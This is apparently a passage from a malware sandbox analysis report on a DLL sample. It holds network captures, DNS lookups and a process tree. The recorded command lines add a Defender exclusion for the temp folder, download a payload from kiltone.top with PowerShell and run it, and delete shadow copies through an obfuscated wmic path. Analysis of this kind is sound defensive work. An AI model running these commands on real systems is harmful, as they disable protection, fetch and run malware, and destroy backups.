                                                                                                    Dec 15, 2024 09:27:37.591561079 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.591592073 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.591599941 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.591638088 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.683163881 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.686675072 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.686712027 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.686749935 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.686767101 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.686809063 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.686883926 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.729428053 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.729461908 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.729496002 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.729548931 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.729569912 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.729595900 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.734833956 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.734858990 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.734896898 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.734929085 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.734970093 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.734970093 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.741178036 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.741209030 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.741242886 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.741276026 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.741293907 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.741317987 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.746828079 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.746846914 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.746884108 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.746912003 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.746928930 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.746954918 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.753547907 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.753571987 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.753645897 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.753678083 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.753729105 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.759860992 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.759888887 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.759931087 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.759954929 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.759980917 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.760001898 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.791326046 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.791352987 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.791491032 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.791532993 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.791579962 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.843477964 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.899261951 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.899298906 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.899355888 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.899393082 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.899409056 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.899461031 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.921564102 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.921586037 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.921627998 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.921658993 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.921679974 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.921813011 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.926991940 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.927009106 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.927048922 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.927072048 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.927092075 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.927122116 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.933515072 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.933535099 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.933587074 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.933609962 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.933633089 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.933651924 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.939219952 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.939244986 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.939279079 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.939296007 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.939323902 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.939338923 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.945611000 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.945626974 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.945667982 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.945682049 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.945708990 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.945732117 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.952195883 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.952215910 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.952274084 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.952292919 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.954392910 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.983532906 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.983561039 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.983616114 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.983642101 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.983658075 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.987654924 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:38.052118063 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:38.091465950 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:38.091492891 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:38.091538906 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:38.091559887 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:38.091590881 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:38.091607094 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:38.113905907 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:38.113929987 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:38.114013910 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:38.114013910 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:38.114032984 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:38.114089966 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:38.118993044 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:38.119014978 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:38.119045019 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:38.119052887 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:38.119102955 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:38.125477076 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:38.125495911 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:38.125586033 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:38.125596046 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:38.125629902 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:38.131921053 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:38.131937027 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:38.132013083 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:38.132021904 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:38.132057905 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:38.137607098 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:38.137622118 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:38.137684107 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:38.137692928 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:38.137737036 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:38.144149065 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:38.144181967 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:38.144220114 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:38.144227982 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:38.144260883 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:38.144274950 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:38.175493956 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:38.175518036 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:38.175558090 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:38.175575972 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:38.175602913 CET49706443192.168.2.845.125.67.168
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 15, 2024 09:27:33.850239038 CET | 50711 | 53 | 192.168.2.8 | 1.1.1.1
Dec 15, 2024 09:27:34.261967897 CET | 53 | 50711 | 1.1.1.1 | 192.168.2.8

Timestamp | Source IP | Dest IP | Checksum | Code | Type
Dec 15, 2024 09:28:26.850207090 CET | 192.168.2.8 | 1.1.1.1 | 4d5a | | Echo
Dec 15, 2024 09:28:26.986779928 CET | 1.1.1.1 | 192.168.2.8 | 555a | | Echo Reply
Dec 15, 2024 09:28:32.592679977 CET | 192.168.2.8 | 1.1.1.1 | 4d59 | | Echo
Dec 15, 2024 09:28:32.729163885 CET | 1.1.1.1 | 192.168.2.8 | 5559 | | Echo Reply

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 15, 2024 09:27:33.850239038 CET | 192.168.2.8 | 1.1.1.1 | 0xf8e5 | Standard query (0) | kiltone.top | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 15, 2024 09:27:34.261967897 CET | 1.1.1.1 | 192.168.2.8 | 0xf8e5 | No error (0) | kiltone.top | | 45.125.67.168 | A (IP address) | IN (0x0001) | false
                                                                                                    • kiltone.top
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49706 | 45.125.67.168 | 443 | 1548 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-15 08:27:35 UTC | 176 | OUT | GET /stelin/Gosjeufon.cpl HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: kiltone.top
Connection: Keep-Alive
2024-12-15 08:27:36 UTC | 253 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0
                                                                                                    Date: Sun, 15 Dec 2024 08:27:36 GMT
                                                                                                    Content-Type: application/octet-stream
                                                                                                    Content-Length: 902856
                                                                                                    Last-Modified: Fri, 13 Dec 2024 23:58:00 GMT
                                                                                                    Connection: close
                                                                                                    ETag: "675cca08-dc6c8"
                                                                                                    Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49707 | 45.125.67.168 | 443 | 3352 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-15 08:27:35 UTC | 176 | OUT | GET /stelin/Gosjeufon.cpl HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: kiltone.top
Connection: Keep-Alive
2024-12-15 08:27:36 UTC | 253 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0
                                                                                                    Date: Sun, 15 Dec 2024 08:27:36 GMT
                                                                                                    Content-Type: application/octet-stream
                                                                                                    Content-Length: 902856
                                                                                                    Last-Modified: Fri, 13 Dec 2024 23:58:00 GMT
                                                                                                    Connection: close
                                                                                                    ETag: "675cca08-dc6c8"
                                                                                                    Accept-Ranges: bytes



                                                                                                    Target ID:0
                                                                                                    Start time:03:27:22
                                                                                                    Start date:15/12/2024
                                                                                                    Path:C:\Windows\System32\loaddll32.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:loaddll32.exe "C:\Users\user\Desktop\TD2HjoogPx.dll"
                                                                                                    Imagebase:0x460000
                                                                                                    File size:126'464 bytes
                                                                                                    MD5 hash:51E6071F9CBA48E79F10C84515AAE618
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:false

                                                                                                    Target ID:2
                                                                                                    Start time:03:27:22
                                                                                                    Start date:15/12/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff6ee680000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:false

                                                                                                    Target ID:3
                                                                                                    Start time:03:27:22
                                                                                                    Start date:15/12/2024
                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\TD2HjoogPx.dll",#1
                                                                                                    Imagebase:0xa40000
                                                                                                    File size:236'544 bytes
                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:4
                                                                                                    Start time:03:27:22
                                                                                                    Start date:15/12/2024
                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:rundll32.exe "C:\Users\user\Desktop\TD2HjoogPx.dll",#1
                                                                                                    Imagebase:0xfc0000
                                                                                                    File size:61'440 bytes
                                                                                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:5
                                                                                                    Start time:03:27:27
                                                                                                    Start date:15/12/2024
                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
                                                                                                    Imagebase:0xa40000
                                                                                                    File size:236'544 bytes
                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:6
                                                                                                    Start time:03:27:27
                                                                                                    Start date:15/12/2024
                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
                                                                                                    Imagebase:0xa40000
                                                                                                    File size:236'544 bytes
                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:7
                                                                                                    Start time:03:27:27
                                                                                                    Start date:15/12/2024
                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
                                                                                                    Imagebase:0xbb0000
                                                                                                    File size:433'152 bytes
                                                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:8
                                                                                                    Start time:03:27:27
                                                                                                    Start date:15/12/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff6ee680000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:9
                                                                                                    Start time:03:27:27
                                                                                                    Start date:15/12/2024
                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
                                                                                                    Imagebase:0xbb0000
                                                                                                    File size:433'152 bytes
                                                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:10
                                                                                                    Start time:03:27:30
                                                                                                    Start date:15/12/2024
                                                                                                    Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                    Imagebase:0x7ff605670000
                                                                                                    File size:496'640 bytes
                                                                                                    MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    Target ID:11
                                                                                                    Start time:03:27:32
                                                                                                    Start date:15/12/2024
                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:cmd /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe
                                                                                                    Imagebase:0xa40000
                                                                                                    File size:236'544 bytes
                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:12
                                                                                                    Start time:03:27:32
                                                                                                    Start date:15/12/2024
                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:cmd /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe
                                                                                                    Imagebase:0xa40000
                                                                                                    File size:236'544 bytes
                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:13
                                                                                                    Start time:03:27:32
                                                                                                    Start date:15/12/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff6ee680000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:14
                                                                                                    Start time:03:27:32
                                                                                                    Start date:15/12/2024
                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe
                                                                                                    Imagebase:0xbb0000
                                                                                                    File size:433'152 bytes
                                                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:15
                                                                                                    Start time:03:27:32
                                                                                                    Start date:15/12/2024
                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe
                                                                                                    Imagebase:0xbb0000
                                                                                                    File size:433'152 bytes
                                                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:16
                                                                                                    Start time:03:27:36
                                                                                                    Start date:15/12/2024
                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:cmd /c %temp%/eryy65ty.exe
                                                                                                    Imagebase:0xa40000
                                                                                                    File size:236'544 bytes
                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:17
                                                                                                    Start time:03:27:36
                                                                                                    Start date:15/12/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff6ee680000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:19
                                                                                                    Start time:03:27:38
                                                                                                    Start date:15/12/2024
                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:cmd /c %temp%/eryy65ty.exe
                                                                                                    Imagebase:0xa40000
                                                                                                    File size:236'544 bytes
                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    Target ID:20
                                                                                                    Start time:03:27:38
                                                                                                    Start date:15/12/2024
                                                                                                    Path:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp/eryy65ty.exe
                                                                                                    Imagebase:0xe30000
                                                                                                    File size:902'856 bytes
                                                                                                    MD5 hash:9049FABA5517305C44BD5F28398FB6B9
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Antivirus matches:
                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                    • Detection: 45%, ReversingLabs
                                                                                                    • Detection: 67%, Virustotal
                                                                                                    Has exited:false

                                                                                                    Target ID:22
                                                                                                    Start time:03:27:43
                                                                                                    Start date:15/12/2024
                                                                                                    Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:c:\SYeXIP\SYeX\..\..\Windows\SYeX\SYeX\..\..\system32\SYeX\SYeX\..\..\wbem\SYeX\SYeXI\..\..\wmic.exe shadowcopy delete
                                                                                                    Imagebase:0x7ff7ceca0000
                                                                                                    File size:576'000 bytes
                                                                                                    MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:23
                                                                                                    Start time:03:27:43
                                                                                                    Start date:15/12/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff6ee680000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

